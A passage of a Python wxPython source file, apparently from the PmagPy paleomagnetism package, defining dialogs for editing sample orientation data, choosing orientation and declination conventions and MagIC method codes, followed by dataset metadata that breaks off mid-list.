orient.txt\n read the data\n display the data from the file in a new grid\n '''\n dlg = wx.FileDialog(\n self, message=\"choose orient file\",\n defaultDir=self.WD,\n defaultFile=\"\",\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR\n )\n if dlg.ShowModal() == wx.ID_OK:\n orient_file = dlg.GetPath()\n dlg.Destroy()\n new_data, dtype, keys = pmag.magic_read_dict(orient_file,\n sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n if len(new_data) > 0:\n self.orient_data={}\n self.orient_data=new_data\n #self.create_sheet()\n self.update_sheet()\n print(\"-I- If you don't see a change in the spreadsheet, you may need to manually re-size the window\")\n\n def on_m_save_file(self,event):\n\n '''\n save demag_orient.txt\n (only the columns that appear on the grid frame)\n '''\n fout = open(os.path.join(self.WD, \"demag_orient.txt\"), 'w')\n STR = \"tab\\tdemag_orient\\n\"\n fout.write(STR)\n headers = [header[0] for header in self.headers]\n STR = \"\\t\".join(headers) + \"\\n\"\n fout.write(STR)\n for sample in self.samples_list:\n STR = \"\"\n for header in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(header)\n value = self.grid.GetCellValue(sample_index, i)\n STR = STR + value + \"\\t\"\n fout.write(STR[:-1] + \"\\n\")\n fout.close()\n if event != None:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"data saved in file demag_orient.txt\" ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n\n def on_m_calc_orient(self,event):\n '''\n This fucntion does exactly what the 'import orientation' fuction does in MagIC.py\n after some dialog boxes the function calls orientation_magic.py\n '''\n # first see if demag_orient.txt\n self.on_m_save_file(None)\n orient_convention_dia = orient_convention(None)\n orient_convention_dia.Center()\n #orient_convention_dia.ShowModal()\n if orient_convention_dia.ShowModal() == wx.ID_OK:\n ocn_flag = orient_convention_dia.ocn_flag\n dcn_flag = orient_convention_dia.dcn_flag\n gmt_flags = orient_convention_dia.gmt_flags\n orient_convention_dia.Destroy()\n else:\n return\n\n or_con = orient_convention_dia.ocn\n dec_correction_con = int(orient_convention_dia.dcn)\n try:\n hours_from_gmt = float(orient_convention_dia.gmt)\n except:\n hours_from_gmt = 0\n try:\n dec_correction = float(orient_convention_dia.correct_dec)\n except:\n dec_correction = 0\n\n method_code_dia=method_code_dialog(None)\n method_code_dia.Center()\n if method_code_dia.ShowModal() == wx.ID_OK:\n bedding_codes_flags=method_code_dia.bedding_codes_flags\n methodcodes_flags=method_code_dia.methodcodes_flags\n method_code_dia.Destroy()\n else:\n print(\"-I- Canceling calculation\")\n return\n\n method_codes = method_code_dia.methodcodes\n average_bedding = method_code_dia.average_bedding\n bed_correction = method_code_dia.bed_correction\n\n command_args=['orientation_magic.py']\n command_args.append(\"-WD %s\"%self.WD)\n command_args.append(\"-Fsa er_samples_orient.txt\")\n command_args.append(\"-Fsi er_sites_orient.txt \")\n command_args.append(\"-f %s\"%\"demag_orient.txt\")\n command_args.append(ocn_flag)\n command_args.append(dcn_flag)\n command_args.append(gmt_flags)\n command_args.append(bedding_codes_flags)\n command_args.append(methodcodes_flags)\n commandline = \" \".join(command_args)\n\n print(\"-I- executing command: %s\" %commandline)\n os.chdir(self.WD)\n if os.path.exists(os.path.join(self.WD, 'er_samples.txt')) or os.path.exists(os.path.join(self.WD, 'er_sites.txt')):\n append = True\n elif os.path.exists(os.path.join(self.WD, 'samples.txt')) or os.path.exists(os.path.join(self.WD, 'sites.txt')):\n append = True\n else:\n append = False\n samp_file = \"er_samples.txt\"\n site_file = \"er_sites.txt\"\n success, error_message = ipmag.orientation_magic(or_con, dec_correction_con, dec_correction,\n bed_correction, hours_from_gmt=hours_from_gmt,\n method_codes=method_codes, average_bedding=average_bedding,\n orient_file='demag_orient.txt', samp_file=samp_file,\n site_file=site_file, input_dir_path=self.WD,\n output_dir_path=self.WD, append=append, data_model=3)\n\n if not success:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"-E- ERROR: Error in running orientation_magic\\n{}\".format(error_message) ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n print(\"-E- ERROR: Error in running orientation_magic\")\n return\n else:\n dlg2 = wx.MessageDialog(None,caption=\"Message:\", message=\"-I- Successfully ran orientation_magic\", style=wx.OK|wx.ICON_INFORMATION)\n dlg2.ShowModal()\n dlg2.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n self.contribution.add_magic_table('samples')\n return\n\n\n def OnCloseWindow(self,event):\n dlg1 = wx.MessageDialog(self,caption=\"Message:\", message=\"Save changes to demag_orient.txt?\\n \" ,style=wx.OK|wx.CANCEL)\n result = dlg1.ShowModal()\n if result == wx.ID_OK:\n self.on_m_save_file(None)\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n if result == wx.ID_CANCEL:\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n\n\nclass orient_convention(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(orient_convention, self).__init__(*args, **kw)\n\n self.InitUI()\n #self.SetSize((250, 200))\n self.SetTitle(\"set orientation convention\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # orientation convention\n #-----------------------\n\n sbs = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation convention' ), wx.VERTICAL )\n\n sbs.AddSpacer(5)\n self.oc_rb1 = wx.RadioButton(pnl, -1,label='Pomeroy: Lab arrow azimuth = mag_azimuth; Lab arrow dip=-field_dip (field_dip is hade)',name='1', style=wx.RB_GROUP)\n sbs.Add(self.oc_rb1)\n sbs.AddSpacer(5)\n self.oc_rb2 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = -field_dip', name='2')\n sbs.Add(self.oc_rb2)\n sbs.AddSpacer(5)\n self.oc_rb3 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth; Lab arrow dip = 90-field_dip (field_dip is inclination of lab arrow)', name='3')\n sbs.Add(self.oc_rb3)\n sbs.AddSpacer(5)\n self.oc_rb4 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth and dip are same as mag_azimuth, field_dip', name='4')\n sbs.Add(self.oc_rb4)\n sbs.AddSpacer(5)\n self.oc_rb5 = wx.RadioButton(pnl, -1, label='ASC: Lab arrow azimuth and dip are mag_azimuth, field_dip-90 (field arrow is inclination of specimen Z direction)',name='5')\n sbs.Add(self.oc_rb5)\n sbs.AddSpacer(5)\n self.oc_rb6 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = 90-field_dip', name='6')\n sbs.Add(self.oc_rb6)\n sbs.AddSpacer(5)\n\n #-----------------------\n # declination correction\n #-----------------------\n sbs2 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'declination correction' ), wx.VERTICAL )\n hbox_dc1 = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs2.AddSpacer(5)\n self.dc_rb1 = wx.RadioButton(pnl, -1, 'Use the IGRF DEC value at the lat/long and date supplied', (10, 50), style=wx.RB_GROUP)\n self.dc_rb2 = wx.RadioButton(pnl, -1, 'Use this DEC:', (10, 50))\n self.dc_tb2 = wx.TextCtrl(pnl,style=wx.CENTER)\n self.dc_rb3 = wx.RadioButton(pnl, -1, 'DEC=0, mag_az is already corrected in file', (10, 50))\n\n sbs2.Add(self.dc_rb1)\n sbs2.AddSpacer(5)\n hbox_dc1.Add(self.dc_rb2)\n hbox_dc1.AddSpacer(5)\n hbox_dc1.Add(self.dc_tb2)\n sbs2.Add(hbox_dc1)\n\n sbs2.AddSpacer(5)\n sbs2.Add(self.dc_rb3)\n sbs2.AddSpacer(5)\n\n\n #-----------------------\n # orienation priority\n #-----------------------\n sbs3 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation priority' ), wx.VERTICAL )\n\n sbs3.AddSpacer(5)\n self.op_rb1 = wx.RadioButton(pnl, -1, label='1) sun compass 2) differential GPS 3) magnetic compass',\n name='1', style=wx.RB_GROUP)\n sbs3.Add(self.op_rb1)\n sbs3.AddSpacer(5)\n self.op_rb2 = wx.RadioButton(pnl, -1, label='1) differential GPS 2) magnetic compass 3) sun compass ',\n name='2')\n sbs3.Add(self.op_rb2)\n sbs3.AddSpacer(5)\n\n\n #-----------------------\n # add local time for GMT\n #-----------------------\n\n sbs4 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'add local time' ), wx.HORIZONTAL )\n #hbox_alt = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs4.AddSpacer(5)\n self.dc_alt = wx.TextCtrl(pnl,style=wx.CENTER)\n alt_txt = wx.StaticText(pnl, label=\"Hours to ADD to local time for GMT, default is 0\",\n style=wx.TE_CENTER)\n sbs4.Add(alt_txt)\n sbs4.AddSpacer(5)\n sbs4.Add(self.dc_alt)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n\n #-----------------------\n # design the frame\n #-----------------------\n\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(sbs2)\n vbox.AddSpacer(10)\n vbox.Add(sbs3)\n vbox.AddSpacer(10)\n vbox.Add(sbs4)\n vbox.AddSpacer(10)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # intialize defalut value\n #-----------------------\n\n self.oc_rb4.SetValue(True)\n self.dc_rb1.SetValue(True)\n self.op_rb1.SetValue(True)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n self.ocn = \"\"\n if self.oc_rb1.GetValue() == True:\n self.ocn = \"1\"\n if self.oc_rb2.GetValue() == True:\n self.ocn=\"2\"\n if self.oc_rb3.GetValue() == True:\n self.ocn=\"3\"\n if self.oc_rb4.GetValue() == True:\n self.ocn = \"4\"\n if self.oc_rb5.GetValue() == True:\n self.ocn=\"5\"\n if self.oc_rb6.GetValue() == True:\n self.ocn=\"6\"\n\n self.dcn = \"\"\n self.correct_dec = \"\"\n if self.dc_rb1.GetValue() == True:\n self.dcn = \"1\"\n if self.dc_rb2.GetValue() == True:\n self.dcn=\"2\"\n try:\n self.correct_dec = float(self.dc_tb2.GetValue())\n except:\n dlg1 = wx.MessageDialog(None, caption=\"Error:\", message=\"Add declination\", style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n if self.dc_rb3.GetValue()==True:\n self.dcn = \"3\"\n\n if self.op_rb1.GetValue() == True:\n self.op = \"1\"\n if self.op_rb2.GetValue() == True:\n self.op = \"2\"\n\n if self.dc_alt.GetValue() != \"\":\n try:\n self.gmt = float(self.dc_alt.GetValue())\n gmt_flags = \"-gmt \" + self.dc_alt.GetValue()\n except:\n gmt_flags=\"\"\n else:\n self.gmt = \"\"\n gmt_flags = \"\"\n #-------------\n self.ocn_flag = \"-ocn \"+ self.ocn\n self.dcn_flag = \"-dcn \"+ self.dcn\n self.gmt_flags = gmt_flags\n self.EndModal(wx.ID_OK)\n #self.Close()\n\n\nclass method_code_dialog(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(method_code_dialog, self).__init__(*args, **kw)\n\n self.InitUI()\n self.SetTitle(\"additional required information\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # MagIC codes\n #-----------------------\n\n sbs1 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'MagIC codes' ), wx.VERTICAL )\n self.cb1 = wx.CheckBox(pnl, -1, 'FS-FD: field sampling done with a drill')\n self.cb2 = wx.CheckBox(pnl, -1, 'FS-H: field sampling done with hand sample')\n self.cb3 = wx.CheckBox(pnl, -1, 'FS-LOC-GPS: field location done with GPS')\n self.cb4 = wx.CheckBox(pnl, -1, 'FS-LOC-MAP: field location done with map')\n self.cb5 = wx.CheckBox(pnl, -1, 'SO-POM: a Pomeroy orientation device was used')\n self.cb6 = wx.CheckBox(pnl, -1, 'SO-ASC: an ASC orientation device was used')\n self.cb7 = wx.CheckBox(pnl, -1, 'SO-MAG: magnetic compass used for all orientations')\n self.cb8 = wx.CheckBox(pnl, -1, 'SO-SUN: sun compass used for all orientations')\n self.cb9 = wx.CheckBox(pnl, -1, 'SO-SM: either magnetic or sun used on all orientations ')\n self.cb10 = wx.CheckBox(pnl, -1, 'SO-SIGHT: orientation from sighting')\n\n for cb in [self.cb1, self.cb2, self.cb3, self.cb4, self.cb5,\n self.cb6, self.cb7, self.cb8, self.cb9, self.cb10]:\n sbs1.Add(cb, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # Bedding convention\n #-----------------------\n\n sbs2 = wx.StaticBoxSizer(wx.StaticBox(pnl, wx.ID_ANY, 'bedding convention'), wx.VERTICAL)\n self.bed_con1 = wx.CheckBox(pnl, -1, 'Take fisher mean of bedding poles?')\n self.bed_con2 = wx.CheckBox(pnl, -1, \"Don't correct bedding dip direction with declination - already correct\")\n\n sbs2.Add(self.bed_con1, flag=wx.BOTTOM, border=5)\n sbs2.Add(self.bed_con2, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.Add(sbs1)\n vbox.AddSpacer(5)\n vbox.Add(sbs2)\n vbox.AddSpacer(5)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n methodcodes=[]\n if self.cb1.GetValue() == True:\n methodcodes.append('FS-FD')\n if self.cb2.GetValue() == True:\n methodcodes.append('FS-H')\n if self.cb3.GetValue() == True:\n methodcodes.append('FS-LOC-GPS')\n if self.cb4.GetValue() == True:\n methodcodes.append('FS-LOC-MAP')\n if self.cb5.GetValue() == True:\n methodcodes.append('SO-POM')\n if self.cb6.GetValue() == True:\n methodcodes.append('SO-ASC')\n if self.cb7.GetValue() == True:\n methodcodes.append('SO-MAG')\n if self.cb8.GetValue() == True:\n methodcodes.append('SO-SUN')\n if self.cb9.GetValue() == True:\n methodcodes.append('SO-SM')\n if self.cb10.GetValue() == True:\n methodcodes.append('SO-SIGHT')\n\n if methodcodes == []:\n self.methodcodes_flags=\"\"\n self.methodcodes = \"\"\n else:\n self.methodcodes_flags = \"-mcd \" + \":\".join(methodcodes)\n self.methodcodes = \":\".join(methodcodes)\n\n bedding_codes=[]\n\n if self.bed_con1.GetValue() == True:\n bedding_codes.append(\"-a\")\n self.average_bedding = True\n else:\n self.average_bedding = False\n if self.bed_con2.GetValue() ==True:\n bedding_codes.append(\"-BCN\")\n self.bed_correction = False\n else:\n self.bed_correction = True\n self.bedding_codes_flags = \" \".join(bedding_codes)\n self.EndModal(wx.ID_OK)\n #self.Close()ls *.html\n", "sub_path": "dialogs/pmag_gui_dialogs.py", "file_name": "pmag_gui_dialogs.py", "file_ext": "py", "file_size_in_byte": 141142, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "wx.Dialog", "line_number": 26, "usage_type": "attribute"}, {"api_name": "wx.Dialog.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "wx.Dialog", "line_number": 28, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 36, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 37, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 47, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 51, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 62, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 63, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 67, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 73, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 89, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 108, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic.convert", "line_number": 131, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic", "line_number": 131, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 155, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 173, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 174, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 174, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 178, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 178, "usage_type": "name"}, {"api_name": "wx.Button", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 181, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 184, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 185, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 188, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 189, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 193, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 195, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 199, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 199, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 201, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 203, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 206, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 207, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 210, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 243, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 243, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 245, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 245, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 245, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 249, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 249, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 256, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 261, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 262, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 275, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 276, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 280, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 284, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 290, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 296, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 298, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 298, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 299, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 301, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 301, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 302, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 305, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", "line_number": 315, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 322, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 322, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 326, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 329, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 330, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 333, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 333, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 351, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 364, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 364, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 372, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 372, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 372, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 382, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 392, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 401, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 402, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 416, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 416, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_dir_button", "line_number": 420, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 420, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 434, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 434, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 435, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 435, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 439, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 439, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 442, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.GridBagSizer", "line_number": 448, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 449, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 451, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 451, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 454, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMBOBOX", "line_number": 456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 459, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 460, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 463, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 463, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 469, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 469, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 470, "usage_type": "call"}, {"api_name": "wx.GridSizer", "line_number": 471, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 472, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 473, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 474, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 475, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 478, "usage_type": 